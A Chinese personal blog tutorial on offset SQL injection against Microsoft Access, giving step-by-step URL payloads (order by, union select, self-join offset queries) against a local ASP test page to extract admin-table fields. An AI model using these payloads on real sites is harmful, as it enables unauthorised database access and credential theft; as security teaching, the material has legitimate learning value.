<!DOCTYPE html><html lang="en"><head><meta name="generator" content="Hexo 3.9.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description"><link rel="stylesheet" type="text/css" href="//fonts.loli.net/css?family=Source+Code+Pro"><link rel="stylesheet" type="text/css" href="/css/style.css?v=2.0.4"><link rel="stylesheet" type="text/css" href="/css/highlight.css?v=2.0.4"><link rel="Shortcut Icon" href="/favicon.ico"><link rel="bookmark" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><title>Access偏移注入 | Hexo</title></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">Access偏移注入</h1><a id="logo" href="/.">Hexo</a><p class="description"></p></div><div id="nav-menu"><a href="/." class="current"><i class="fa fa-home"> Home</i></a><a href="/archives/"><i class="fa fa-archive"> Archive</i></a><a href="/about/"><i class="fa fa-user"> About</i></a><a href="/atom.xml"><i class="fa fa-rss"> RSS</i></a></div><div id="search-form"><div id="result-mask" class="hide"></div><label><input id="search-key" type="text" autocomplete="off" placeholder="search"></label><div id="result-wrap" class="hide"><div id="search-result"></div></div><div class="hide"><template id="search-tpl"><div class="item"><a href="/{path}" title="{title}"><div class="title">{title}</div><div class="time">{date}</div><div class="tags">{tags}</div></a></div></template></div></div></div><div id="layout" class="layout-g"><div class="layout-l"><div class="content_container"><div class="post"><h1 class="post-title">Access偏移注入</h1><div class="post-meta"><a href="/2019/10/25/Access偏移注入/#comments" class="comment-count"></a><p><span class="date">Oct 25, 2019</span><span><i id="busuanzi_container_page_pv"><i id="busuanzi_value_page_pv"></i><i>Hits</i></i></span></p></div><div class="post-content"><p><strong>原理</strong>:</p>
<p>借用数据库的自连接查询让数据库内部发生乱序，从而偏移出所需要的字段在我们的页面上显示！</p>
<p>先来说说什么情况用偏移注入吧，条件如下：</p>
<pre><code>注入表的字段数大于或等于目标表列的两倍最好，这样一般都能显示齐。而一般admin表3个列以上吧（如：id,name,pass）。
你知道目标表的一个字段，比如id，但是却不知道其他字段。比如我建表啊，如果admin字段为“H4xsscker_GLY”之类的，俺就比较难了。这里就讲一下一般的情况。</code></pre><p>##步骤</p>
<pre><code>1、 判断字段数

2、 判断表名

3、 开始偏移注入</code></pre><p><strong>实例：</strong><br>1、判断注入点</p>
<pre><code>127.0.0.1/asp/index.asp?id=1513 and 1=1 正常
127.0.0.1/asp/index.asp?id=1513 and 1=2 错误</code></pre><p>2、查询字段个数</p>
<pre><code>127.0.0.1/asp/index.asp?id=1513 order by 22 正常
127.0.0.1/asp/index.asp?id=1513 order by 23 错误</code></pre><p>3、爆出显位</p>
<pre><code>127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin</code></pre><p>4、判断表内存在的字段个数</p>
<pre><code>127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin 错误
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from admin 错误</code></pre><p>直到……</p>
<pre><code>127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin 正确</code></pre><p>说明了admin表下有6个字段；</p>
<p>用”*”代表 admin 表的字段数，计算*代替字符的位数。</p>
<p>Access偏移注入原理，基本公式为：</p>
<p>order by 出的字段数减去*号的字段数，然而再用order by的字段数减去2倍刚才得出来的答案；</p>
<p>也就是：</p>
<pre><code>* = 6个字符

2 × * = 12个字符

22 - 12 = 10个字符</code></pre><p>5、爆列名数据</p>
<p>一级偏移语句：</p>
<pre><code>127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)</code></pre><p>如果你发现，上面查看了网页源码也爆不出数据，请用以下方法：</p>
<p>二级偏移语句：</p>
<pre><code>127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
注意：这里是10个字段再减去了表里的6个字段，所以二级偏移这里是select 1,2,3,4</code></pre><p><a href="https://www.freebuf.com/articles/web/127924.html" target="_blank" rel="noopener">案列</a></p>
</div><div class="post-copyright"><blockquote><p>Original author: KING</p><p>Original link: <a href="http://yoursite.com/2019/10/25/Access偏移注入/">http://yoursite.com/2019/10/25/Access偏移注入/</a></p><p>Copyright Notice: Please indicate the source of the reprint (must retain the author's signature and link)</p></blockquote></div><div class="tags"></div><div class="post-share"><div class="social-share"><span>Share:</span></div></div><div class="post-nav"><a href="/2019/10/23/SSRF/" class="next">SSRF</a></div><div id="comments"></div></div></div></div><div class="layout-r"><div id="sidebar"><div class="search-pla"></div><div id="toc" class="widget"><div class="widget-title"><i class="fa fa-fei">Contents</i></div></div><div class="widget"><div class="widget-title"><i class="fa fa-xie"> Recent</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/10/25/Access偏移注入/">Access偏移注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/23/SSRF/">SSRF</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/23/XXE实体注入/">XXE实体注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/19/CSRF/">CSRF</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/19/文件上传漏洞三/">文件上传漏洞三</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/18/DOM Based XSSDOM/">DOM Based XSSDOM</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/18/文件上传漏洞二/">文件上传漏洞二</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/17/盲注/">盲注</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/17/文件上传漏洞一/">文件上传漏洞一</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/17/宽字节注入/">宽字节注入</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-biao"> Tags</i></div><div class="tagcloud"></div></div><div class="widget"><div class="widget-title"><i class="fa fa-archive"> Archive</i></div><ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-you"> Blogroll</i></div><ul></ul><a href="http://www.example1.com/" title="site-name1" target="_blank">site-name1</a><ul></ul><a href="http://www.example2.com/" title="site-name2" target="_blank">site-name2</a><ul></ul><a href="http://www.example3.com/" title="site-name3" target="_blank">site-name3</a></div></div></div></div><a id="totop" href="#top"></a><div id="footer"><div class="footer-info"><p><a href="/baidusitemap.xml">Site Map</a> |  <a href="/atom.xml">Subscribe to this site</a> |  <a href="/about/">Contact the blogger</a></p><p>本站总访问量：<i id="busuanzi_container_site_pv"><i id="busuanzi_value_site_pv"></i></i>次，本站总访客数:<i id="busuanzi_container_site_uv"><i id="busuanzi_value_site_uv"></i></i>人</p><p><span> Copyright &copy;<a href="/." rel="nofollow">KING.</a></span><span> Theme by<a rel="nofollow" target="_blank" href="https://github.com/chaooo/hexo-theme-BlueLake"> BlueLake.</a></span><span> Count by<a href="http://busuanzi.ibruce.info/"> busuanzi.</a></span><span> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a></span></p></div></div></div><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><script type="text/javascript" src="/js/search.json.js?v=2.0.4"></script><script type="text/javascript" src="/js/toctotop.js?v=2.0.4" async></script><link rel="stylesheet" type="text/css" href="/share/css/share.css"><script type="text/javascript" src="/share/js/social-share.js" charset="utf-8"></script><script type="text/javascript" src="/share/js/qrcode.js" charset="utf-8"></script></body></html>